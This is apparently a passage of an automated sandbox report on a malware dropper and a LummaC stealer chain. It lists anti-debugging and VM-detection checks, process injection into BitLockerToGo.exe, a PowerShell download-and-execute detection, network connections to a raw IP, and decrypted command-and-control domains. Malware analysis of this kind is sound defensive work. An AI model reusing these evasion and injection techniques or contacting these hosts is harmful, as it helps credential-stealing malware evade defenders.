Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe TID: 2800	Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe TID: 2800	Thread sleep time: -74037s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe TID: 4020	Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe TID: 2672	Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe TID: 2672	Thread sleep time: -62031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe TID: 6732	Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe TID: 2232	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe TID: 5124	Thread sleep time: -56028s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 2104	Thread sleep time: -270000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 4012	Thread sleep count: 4173 > 30
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe TID: 7076	Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe TID: 7076	Thread sleep time: -72036s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe TID: 1196	Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe TID: 5180	Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe TID: 7104	Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe TID: 5960	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe TID: 6432	Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe TID: 7100	Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe TID: 7100	Thread sleep time: -66033s >= -30000s
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe TID: 340	Thread sleep count: 9882 > 30
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe TID: 340	Thread sleep time: -19764000s >= -30000s
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe TID: 6620	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe TID: 6620	Thread sleep time: -2100000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1976	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6552	Thread sleep count: 4419 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6616	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4456	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 3752	Thread sleep time: -150000s >= -30000s

Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809

Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\regsvr32.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Last function: Thread delayed
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\2E02vIiMfd.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Code function: 8_2_00406301 FindFirstFileW,FindClose,	8_2_00406301
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Code function: 8_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	8_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0047DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_0047DC54
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0048A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_0048A087
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0048A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_0048A1E2
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0047E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	20_2_0047E472
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0048A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	20_2_0048A570
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0044C622 FindFirstFileExW,	20_2_0044C622
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_004866DC FindFirstFileW,FindNextFileW,FindClose,	20_2_004866DC
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00487333 FindFirstFileW,FindClose,	20_2_00487333
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_004873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	20_2_004873D4
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0047D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_0047D921

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_00415FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

20_2_00415FC8

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe	Thread delayed: delay time: 60000
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\567757	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\567757\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: skotes.exe, skotes.exe, 00000006.00000002.4186184510.0000000000808000.00000040.00000001.01000000.00000008.sdmp, 8a7032211b.exe, 0000001D.00000002.3040862009.00000000005F4000.00000040.00000001.01000000.00000012.sdmp, 714ab8b5fd.exe, 00000021.00000002.3202169749.000000000038E000.00000040.00000001.01000000.00000014.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ac911b4662.tmp, 00000026.00000002.2773134219.0000000000927000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\U
Source: regsvr32.exe, 0000002A.00000002.4194977140.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: 714ab8b5fd.exe, 00000021.00000002.3203617051.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.3161371476.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2989447188.00000000011DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWZ
Source: regsvr32.exe, 0000002A.00000002.4194977140.0000000002841000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: regsvr32.exe, 0000002A.00000002.4194977140.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: ac911b4662.tmp, 00000026.00000002.2773134219.0000000000927000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yM
Source: skotes.exe, 00000006.00000002.4192805438.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWr
Source: Appeal.com, 00000014.00000002.3602824876.0000000001C23000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnq
Source: 8a7032211b.exe, 0000001D.00000003.2992760742.0000000001099000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000002.3105862595.0000000001099000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWe
Source: skotes.exe, 00000006.00000002.4192805438.0000000000BCA000.00000004.00000020.00020000.00000000.sdmp, Appeal.com, 00000014.00000002.3602824876.0000000001B7B000.00000004.00000020.00020000.00000000.sdmp, Appeal.com, 00000014.00000002.3602824876.0000000001C23000.00000004.00000020.00020000.00000000.sdmp, 2328527160.exe, 00000018.00000002.2689677754.000000000158C000.00000004.00000020.00020000.00000000.sdmp, 2328527160.exe, 00000018.00000002.2690470302.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2822481060.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2992760742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2647791506.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2823226367.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3023458923.00000000010D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 2E02vIiMfd.exe, 00000000.00000002.1738153276.0000000000C18000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1758582307.0000000000808000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000002.1769517290.0000000000808000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.4186184510.0000000000808000.00000040.00000001.01000000.00000008.sdmp, 8a7032211b.exe, 0000001D.00000002.3040862009.00000000005F4000.00000040.00000001.01000000.00000012.sdmp, 714ab8b5fd.exe, 00000021.00000002.3202169749.000000000038E000.00000040.00000001.01000000.00000014.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: regsvr32.exe, 0000002A.00000002.4194977140.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: BitLockerToGo.exe, 0000001E.00000002.4186911477.000000000094C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8B
Source: skotes.exe, 00000006.00000002.4192805438.0000000000B89000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWHK
Source: c3d996d758.exe, 00000007.00000002.2684691067.0000000001237000.00000004.00000020.00020000.00000000.sdmp, a58cbe76b9.exe, 00000020.00000002.3043022014.00000000010E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\2E02vIiMfd.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\2E02vIiMfd.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\2E02vIiMfd.exe

Code function: 0_2_054304ED Start: 054305C8 End: 05430504

0_2_054304ED

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Process queried: DebugPort
Source: C:\Windows\System32\regsvr32.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\2E02vIiMfd.exe

Code function: 0_2_05430DBE rdtsc

0_2_05430DBE

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_0048F4FF BlockInput,

20_2_0048F4FF

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_0041338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

20_2_0041338B

Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe

Code function: 8_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

8_2_00406328

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0064652B mov eax, dword ptr fs:[00000030h]	6_2_0064652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0064A302 mov eax, dword ptr fs:[00000030h]	6_2_0064A302
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00435058 mov eax, dword ptr fs:[00000030h]	20_2_00435058
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Code function: 22_2_02F1E4CD mov edi, dword ptr fs:[00000030h]	22_2_02F1E4CD
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Code function: 22_2_02F1E64A mov edi, dword ptr fs:[00000030h]	22_2_02F1E64A

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_004720AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

20_2_004720AA

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process token adjusted: Debug
Source: C:\Windows\System32\regsvr32.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00442992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_00442992
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00430BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_00430BAF
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00430D45 SetUnhandledExceptionFilter,	20_2_00430D45
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00430F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_00430F91

Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 208.95.112.1 80
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 91.212.166.99 4404

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: Appeal.com PID: 4340, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 320000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe

Code function: 22_2_02F1E4CD GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

22_2_02F1E4CD

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 320000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Memory written: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Memory written: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: 8a7032211b.exe, 0000001D.00000002.3036275003.0000000000411000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: finickypwk.lat
Source: 8a7032211b.exe, 0000001D.00000002.3036275003.0000000000411000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: shoefeatthe.lat
Source: 8a7032211b.exe, 0000001D.00000002.3036275003.0000000000411000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: savorraiykj.lat
Source: 8a7032211b.exe, 0000001D.00000002.3036275003.0000000000411000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: kickykiduz.lat
Source: 8a7032211b.exe, 0000001D.00000002.3036275003.0000000000411000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: miniatureyu.lat
Source: 8a7032211b.exe, 0000001D.00000002.3036275003.0000000000411000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: leggelatez.lat
Source: 8a7032211b.exe, 0000001D.00000002.3036275003.0000000000411000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: washyceehsu.lat
Source: 8a7032211b.exe, 0000001D.00000002.3036275003.0000000000411000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: bloodyswif.lat
Source: 8a7032211b.exe, 0000001D.00000002.3036275003.0000000000411000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: breakfasutwy.cyou
Source: a58cbe76b9.exe, 00000020.00000002.3232599408.0000000009EE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: robinsharez.shop
Source: a58cbe76b9.exe, 00000020.00000002.3232599408.0000000009EE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: handscreamny.shop
Source: a58cbe76b9.exe, 00000020.00000002.3232599408.0000000009EE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: chipdonkeruz.shop
Source: a58cbe76b9.exe, 00000020.00000002.3232599408.0000000009EE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: versersleep.shop
Source: a58cbe76b9.exe, 00000020.00000002.3232599408.0000000009EE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: crowdwarek.shop
Source: a58cbe76b9.exe, 00000020.00000002.3232599408.0000000009EE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: apporholis.shop
Source: a58cbe76b9.exe, 00000020.00000002.3232599408.0000000009EE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: femalsabler.shop
Source: a58cbe76b9.exe, 00000020.00000002.3232599408.0000000009EE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: soundtappysk.shop
Source: a58cbe76b9.exe, 00000020.00000002.3232599408.0000000009EE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: flockanxiius.sbs
Source: 714ab8b5fd.exe, 00000021.00000003.2638689893.00000000050B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: 714ab8b5fd.exe, 00000021.00000003.2638689893.00000000050B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: 714ab8b5fd.exe, 00000021.00000003.2638689893.00000000050B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: 714ab8b5fd.exe, 00000021.00000003.2638689893.00000000050B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: 714ab8b5fd.exe, 00000021.00000003.2638689893.00000000050B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: 714ab8b5fd.exe, 00000021.00000003.2638689893.00000000050B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: 714ab8b5fd.exe, 00000021.00000003.2638689893.00000000050B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: 714ab8b5fd.exe, 00000021.00000003.2638689893.00000000050B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: 714ab8b5fd.exe, 00000021.00000003.2638689893.00000000050B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: tawdrydadysz.icu

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 45D008	Jump to behavior
